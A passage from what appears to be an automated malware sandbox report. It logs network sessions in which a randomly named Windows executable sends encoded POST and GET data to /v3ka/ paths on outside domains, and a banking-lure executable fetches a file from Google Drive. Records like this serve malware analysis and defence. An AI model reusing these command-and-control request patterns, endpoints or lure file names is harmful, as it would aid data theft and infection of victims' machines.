nf8dPP8p=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
Feb 28, 2024 15:50:48.070740938 CET	3858	OUT	Data Raw: 37 54 72 44 5a 4d 36 4b 6c 58 33 50 42 75 51 39 44 65 58 31 6e 71 32 6e 56 63 69 6b 77 67 37 59 6d 67 6c 55 75 74 72 54 78 55 32 36 75 76 68 38 4b 4e 4f 74 38 35 31 2b 42 50 4f 62 4d 4f 45 77 4f 41 51 34 47 37 4a 34 52 71 78 47 74 76 38 50 7a 49 Data Ascii: 7TrDZM6KlX3PBuQ9DeX1nq2nVcikwg7YmglUutrTxU26uvh8KNOt851+BPObMOEwOAQ4G7J4RqxGtv8PzIYog7AoRCtaa6cfNfPGMD7HCcUPUWSRqrgaQO6Ff+8B0LZRTXJ6yIcE26ZG1X0JPmuVpzc0aFBP5de1sgdNg5Rt8U/y8KPimfso39gJsTti96Sg0smQfOAwcxNr2ygGUiSnYRCuqbG/58C5c5GVsJLdDak+EieAMV9
Feb 28, 2024 15:50:48.273121119 CET	2572	OUT	Data Raw: 6d 44 39 4e 6a 54 61 59 48 35 51 59 57 55 4f 34 45 6d 2b 78 55 6b 39 4e 57 49 4a 56 35 32 44 71 33 66 71 6f 53 58 5a 70 45 6b 71 64 6c 6f 34 62 36 48 7a 65 42 61 6d 78 4f 65 4c 70 66 65 63 38 79 74 39 32 6b 77 41 43 36 78 6a 6e 38 4d 2b 7a 44 7a Data Ascii: mD9NjTaYH5QYWUO4Em+xUk9NWIJV52Dq3fqoSXZpEkqdlo4b6HzeBamxOeLpfec8yt92kwAC6xjn8M+zDzt4lFpkh4KPaaC0Qgwc2JvJsrTOI3hYm476QOqE4qOVZyVKkUIKMLn72ugDnkyVOTLOVptWnzTR1dWfBFfp2LB0rtjYxZ3gEC95L4eaEtYkNNC+YkT2eDW3dqIUln8LnZW6lkfaBMo96ZxnFQs20J4rBSF1a3vhtaD
Feb 28, 2024 15:50:48.273169041 CET	5144	OUT	Data Raw: 73 75 6f 48 4a 52 6c 4b 79 63 45 4d 71 56 54 69 6b 38 33 38 67 38 69 6d 49 70 49 78 51 56 6a 61 2f 68 4b 4c 58 76 38 46 4a 31 65 7a 63 76 4b 2b 34 46 69 30 32 6b 38 55 71 32 31 51 57 77 62 6c 4d 7a 78 50 55 32 77 57 6d 53 44 6f 72 44 73 65 48 50 Data Ascii: suoHJRlKycEMqVTik838g8imIpIxQVja/hKLXv8FJ1ezcvK+4Fi02k8Uq21QWwblMzxPU2wWmSDorDseHPjlcRMED2w7UC/EZftFtoyg3G7HxtT4IXGoWqT4eES8MnmEGF4Rys8agGQsPFM6ABNhZoFpr0uHYyWN4UdjrRCPwmSUZmdi9a4GrVuxi1Jfl/xiEDnKpX9MmD0JJ2ObD7QEnnvGcfIPviFDp5jtwAKXM1IEqDsCuca
Feb 28, 2024 15:50:48.273214102 CET	5144	OUT	Data Raw: 46 6c 77 62 6e 54 53 38 68 73 57 77 67 53 46 68 66 5a 32 57 4d 63 41 66 41 31 72 39 79 32 61 64 66 6b 31 56 38 58 70 39 58 6d 74 4a 4a 4a 63 2f 35 32 59 41 54 59 54 58 79 61 76 2f 50 76 30 4f 73 37 77 62 6f 30 43 32 43 6a 65 31 70 42 41 78 36 42 Data Ascii: FlwbnTS8hsWwgSFhfZ2WMcAfA1r9y2adfk1V8Xp9XmtJJJc/52YATYTXyav/Pv0Os7wbo0C2Cje1pBAx6B4WSsVkyZSORCFaZzvSLQ6D+ZZLwaahTGT0yhXuFrXYwOlgA8v0p2AqbvXnUxcitth2kHhRRdGNb7IaeBmE1D1TB/4oCKkOb/mURn+8CQHMtaBFkcqnz13TKxAnksWcHlosfMoYUreNxX+eRrV32UV8TiDJhsKM+V0
Feb 28, 2024 15:50:48.273386955 CET	5144	OUT	Data Raw: 4c 76 2f 33 65 5a 67 45 4d 75 70 63 42 79 50 66 32 5a 51 37 44 63 69 57 34 4a 46 55 71 74 65 5a 41 69 39 54 4c 37 67 54 59 55 64 75 59 75 67 49 4b 4d 4e 75 46 38 47 32 56 6d 6c 2b 72 6a 77 33 4c 70 72 66 6d 68 4a 7a 44 36 36 37 32 45 47 4a 75 50 Data Ascii: Lv/3eZgEMupcByPf2ZQ7DciW4JFUqteZAi9TL7gTYUduYugIKMNuF8G2Vml+rjw3LprfmhJzD6672EGJuP378wR5xObZY9x8xr0OOFgovLmjTscrnYz7fgs4Z7WtHSL7S8GAMNuBYiy7BIUNZCgm/uo0Xv9wB0OSSfW4MYoTBa4B9VJ2qGhImXkyMjlPVzk4gWxnezg+kXjpsN0Fky0pijVj1Wv+QHQrBZJ1scV6dto1xM/NQ4n
Feb 28, 2024 15:50:48.273560047 CET	7716	OUT	Data Raw: 6b 64 71 48 37 56 7a 6a 52 72 6d 73 63 4d 78 31 34 44 78 48 78 57 68 70 44 42 65 49 52 67 36 78 57 33 52 4b 47 76 33 6d 70 6a 32 73 54 67 70 4e 46 49 6e 34 51 65 54 74 36 46 4c 4d 39 6b 2f 53 55 6f 42 69 4a 52 62 64 45 72 4c 65 69 6c 42 4e 64 63 Data Ascii: kdqH7VzjRrmscMx14DxHxWhpDBeIRg6xW3RKGv3mpj2sTgpNFIn4QeTt6FLM9k/SUoBiJRbdErLeilBNdc+nDPplHhPAvGwgJAe2mtXY5G4JYm6UNNKCm5EfIZ3C0A3j0igdsO2EYkAABGgIVzo4HTwb3efemK9fE7tWwZS7QSDkXR3zxAgif44/hJVaS6u858SfTapD7IK9KNTjCh/qs4e4DqY5XuXkT1p2wiIOJ8aJuY1U5j+
Feb 28, 2024 15:50:48.476104975 CET	2572	OUT	Data Raw: 61 4c 38 6b 30 2b 76 4f 58 67 76 73 64 77 4f 32 54 43 31 47 33 53 39 41 34 46 4b 71 49 79 4a 6a 6f 6e 5a 4f 43 70 71 45 48 44 39 6e 74 67 48 33 67 71 65 33 4e 4c 6e 53 52 75 57 34 6e 33 58 4d 30 6a 31 43 45 56 48 4b 71 72 67 72 54 46 31 4d 6c 66 Data Ascii: aL8k0+vOXgvsdwO2TC1G3S9A4FKqIyJjonZOCpqEHD9ntgH3gqe3NLnSRuW4n3XM0j1CEVHKqrgrTF1MlfJuYydyjCD0on39THFV056atgPjtyXvilKlYMBY41f0qWknhTV8riYvXOQH91cjs7NMaZ4+JN2cvk5lV7fDf7aqtSz7/5iUKFzVm+jmiIemQminyXQW9nkFgHY1OqKDh3pKbt0xBdwTpty4F0JjRakopRdTYVF2KkJ
Feb 28, 2024 15:50:48.476222992 CET	2572	OUT	Data Raw: 4b 58 47 71 55 32 6a 79 61 7a 58 64 2b 53 59 44 51 75 6a 50 33 59 56 6c 43 73 72 43 35 46 64 66 62 39 45 35 59 6d 59 4f 39 66 71 79 44 76 36 4c 4c 57 72 76 4f 6d 51 2b 56 64 5a 64 65 79 2b 4e 35 50 53 53 6c 46 2b 68 4e 79 41 39 6a 74 66 48 33 39 Data Ascii: KXGqU2jyazXd+SYDQujP3YVlCsrC5Fdfb9E5YmYO9fqyDv6LLWrvOmQ+VdZdey+N5PSSlF+hNyA9jtfH39IEHcVBYEkvSjBxOLJttUYpm7DBtc48VcViq5qRG2rtM13djr8rbJWpdI1AjjADq2jodGAQMz3thSKWau9fUsX6MxQ11DfdJ89KX2+rjf2DS+dcjtsq9YRcIy2HnxXiSaAkENZ/bZDoifVOtBlso6wD2Jlh663efba
Feb 28, 2024 15:50:48.476583958 CET	2572	OUT	Data Raw: 6b 53 39 79 42 6c 30 48 44 69 66 51 6d 55 6d 57 6f 74 2b 49 50 58 4f 6b 30 7a 4b 36 31 4f 43 50 67 44 62 53 78 4a 54 6a 34 56 6c 6b 39 6e 47 4d 7a 6c 43 63 57 39 79 74 6b 31 75 30 65 62 44 6c 43 47 72 76 33 69 4a 2b 6f 6e 2b 6a 72 32 54 6e 63 35 Data Ascii: kS9yBl0HDifQmUmWot+IPXOk0zK61OCPgDbSxJTj4Vlk9nGMzlCcW9ytk1u0ebDlCGrv3iJ+on+jr2Tnc5mwdmcNktftrX8fWsBgyvqEAqBjg7rkJB06OXW7Kiohr8VQLUh0utbXr7W/9wqzuT8nrdW6zZieu9zGmP8S9TyzxjuVV6ZSthskMdnYShuonTIgooKIG6YOPi7HSyn6CJgGB2sM4pFDB4JYJXNnTouTsQxUCo1gLwm
Feb 28, 2024 15:50:48.476739883 CET	7180	OUT	Data Raw: 52 6d 7a 45 45 55 47 47 6d 2f 66 48 68 44 45 39 55 52 38 5a 71 36 45 50 72 50 37 54 53 68 45 61 64 42 57 43 59 34 75 30 6f 61 33 75 39 5a 42 4f 77 71 39 6c 41 76 51 56 5a 67 4d 61 76 33 48 51 38 45 43 59 4b 57 4b 39 6a 73 36 54 70 6b 43 6c 69 6c Data Ascii: RmzEEUGGm/fHhDE9UR8Zq6EPrP7TShEadBWCY4u0oa3u9ZBOwq9lAvQVZgMav3HQ8ECYKWK9js6TpkClilbzoompk2kbPd27RJaraSmWo6QUCp0YmQues5tnYdLzMsFKjAgpO154d1QO/un5pdrmq3NiSsm6fakpP5ije/fY2hw9zRdZDpgMQhufWkeZnh2PsD42WZnPkZCmugZmE85iFJsJ8M+KAqdapwMoBcOU77bi/4ZwLol
Feb 28, 2024 15:50:48.781225920 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:50:48 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	50288	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:50.810014009 CET	466	OUT	GET /v3ka/?nf8dPP8p=GFfLE978cTjgJhl1mwUYbE5kXfR5gz6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3lctYW3c8py2i2Lm0Nk=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.stellerechoes.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:50:51.096242905 CET	548	IN	HTTP/1.1 404 Not Found Date: Wed, 28 Feb 2024 14:50:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	50289	91.195.240.19	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:51:05.030308962 CET	760	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.continentaloilandgas.com Origin: http://www.continentaloilandgas.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.continentaloilandgas.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 43 32 6d 32 48 77 61 41 67 5a 58 52 52 73 49 51 6f 4e 6e 43 4b 4b 76 48 47 51 47 61 63 72 44 46 2f 5a 4d 6a 4a 35 30 44 56 4b 4a 76 4a 46 71 64 74 5a 77 4a 56 42 54 38 54 65 4d 70 47 47 4e 58 4c 43 30 55 55 34 6e 79 64 36 65 57 67 2f 75 73 6e 34 63 47 6c 66 57 69 57 69 63 65 6e 43 66 31 58 33 69 50 31 4d 41 69 2f 5a 68 70 4a 46 4b 31 5a 6f 2f 37 6a 57 64 44 6f 70 48 4c 67 53 6e 78 61 6d 70 68 71 54 4e 6c 43 31 35 73 66 6e 79 5a 39 5a 4a 4f 6e 32 58 32 5a 71 6b 63 30 69 4f 67 54 2b 49 4e 54 2f 6a 34 7a 62 75 30 36 32 72 6d 50 76 31 55 79 43 41 42 58 42 34 69 69 34 69 69 37 51 3d 3d Data Ascii: nf8dPP8p=C2m2HwaAgZXRRsIQoNnCKKvHGQGacrDF/ZMjJ50DVKJvJFqdtZwJVBT8TeMpGGNXLC0UU4nyd6eWg/usn4cGlfWiWicenCf1X3iP1MAi/ZhpJFK1Zo/7jWdDopHLgSnxamphqTNlC15sfnyZ9ZJOn2X2Zqkc0iOgT+INT/j4zbu062rmPv1UyCABXB4ii4ii7Q==
Feb 28, 2024 15:51:05.333079100 CET	299	IN	HTTP/1.1 405 Not Allowed date: Wed, 28 Feb 2024 14:51:05 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.11.20	50290	91.195.240.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:51:08.620886087 CET	1100	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.continentaloilandgas.com Origin: http://www.continentaloilandgas.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.continentaloilandgas.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 43 32 6d 32 48 77 61 41 67 5a 58 52 51 4a 41 51 74 71 37 43 4c 71 76 41 44 51 47 61 53 4c 44 42 2f 5a 41 6a 4a 34 41 54 56 35 39 76 4a 6e 79 64 2f 4e 63 4a 55 42 54 38 48 4f 4d 73 65 6d 4e 63 4c 43 6f 63 55 34 72 79 64 37 36 57 68 4f 4f 73 68 49 63 46 39 50 57 74 52 69 63 62 6a 43 66 2f 58 33 75 70 31 4e 55 69 38 74 52 70 49 42 79 31 4b 71 48 30 30 32 64 2f 6a 4a 48 49 72 79 6d 77 61 6d 6c 59 71 52 64 66 44 48 6c 73 66 48 53 5a 73 70 4a 42 6f 32 58 39 46 61 6c 65 31 41 47 71 4d 66 55 46 56 49 54 43 33 4a 62 50 77 78 54 59 49 74 39 32 71 79 6f 65 55 77 52 67 67 36 44 6c 6d 54 64 54 2b 33 2f 78 4d 77 6e 37 7a 4e 71 38 55 4d 35 4c 41 36 65 77 35 67 31 4d 74 41 30 67 36 73 50 4e 72 32 47 70 5a 71 76 71 69 50 30 44 71 50 64 33 32 4b 58 2f 4e 59 75 73 5a 53 43 59 57 33 50 74 4a 79 38 7a 66 59 4d 79 78 68 46 65 49 34 72 65 65 77 79 72 6e 42 48 6f 33 71 4c 6b 7a 70 48 4c 44 32 38 42 42 50 67 57 69 55 4c 34 7a 57 6a 30 64 6d 2f 55 44 47 62 73 66 4a 6e 77 33 38 62 53 5a 37 50 6e 70 57 31 36 73 74 4a 66 68 4a 4a 31 43 71 67 6e 65 38 6c 4c 35 57 65 44 45 63 4f 76 36 2f 41 62 45 43 44 67 30 43 71 51 79 2f 6d 2f 72 42 2b 75 48 61 6e 4e 69 4e 79 30 6c 78 2b 6f 30 49 65 4d 79 31 67 75 68 61 45 52 59 75 67 43 4a 76 43 74 75 70 38 54 51 4e 69 76 71 78 62 59 38 50 30 56 4b 6b 6f 35 44 44 61 63 4e 31 66 42 6f 38 68 4c 67 47 61 61 4a 51 73 58 47 5a 32 44 73 50 47 64 64 41 31 2b 6f 44 67 6a 6e 34 47 6b 45 35 49 56 2f 63 77 61 75 4c 54 38 6b 41 39 65 4b 33 33 75 77 49 35 45 50 42 72 47 33 56 69 7a 46 35 2b 71 67 56 51 65 7a 52 31 4e 4e 74 2b 4d 45 76 57 42 57 58 49 70 33 74 72 35 6a 4c 46 61 48 66 6f 3d Data Ascii: nf8dPP8p=C2m2HwaAgZXRQJAQtq7CLqvADQGaSLDB/ZAjJ4ATV59vJnyd/NcJUBT8HOMsemNcLCocU4ryd76WhOOshIcF9PWtRicbjCf/X3up1NUi8tRpIBy1KqH002d/jJHIrymwamlYqRdfDHlsfHSZspJBo2X9Fale1AGqMfUFVITC3JbPwxTYIt92qyoeUwRgg6DlmTdT+3/xMwn7zNq8UM5LA6ew5g1MtA0g6sPNr2GpZqvqiP0DqPd32KX/NYusZSCYW3PtJy8zfYMyxhFeI4reewyrnBHo3qLkzpHLD28BBPgWiUL4zWj0dm/UDGbsfJnw38bSZ7PnpW16stJfhJJ1Cqgne8lL5WeDEcOv6/AbECDg0CqQy/m/rB+uHanNiNy0lx+o0IeMy1guhaERYugCJvCtup8TQNivqxbY8P0VKko5DDacN1fBo8hLgGaaJQsXGZ2DsPGddA1+oDgjn4GkE5IV/cwauLT8kA9eK33uwI5EPBrG3VizF5+qgVQezR1NNt+MEvWBWXIp3tr5jLFaHfo=
Feb 28, 2024 15:51:08.925905943 CET	299	IN	HTTP/1.1 405 Not Allowed date: Wed, 28 Feb 2024 14:51:08 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	50224	142.250.68.46	443	5520	C:\Users\user\Desktop\cuenta iban-ES65.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-28 14:43:34 UTC	216	OUT	GET /uc?export=download&id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
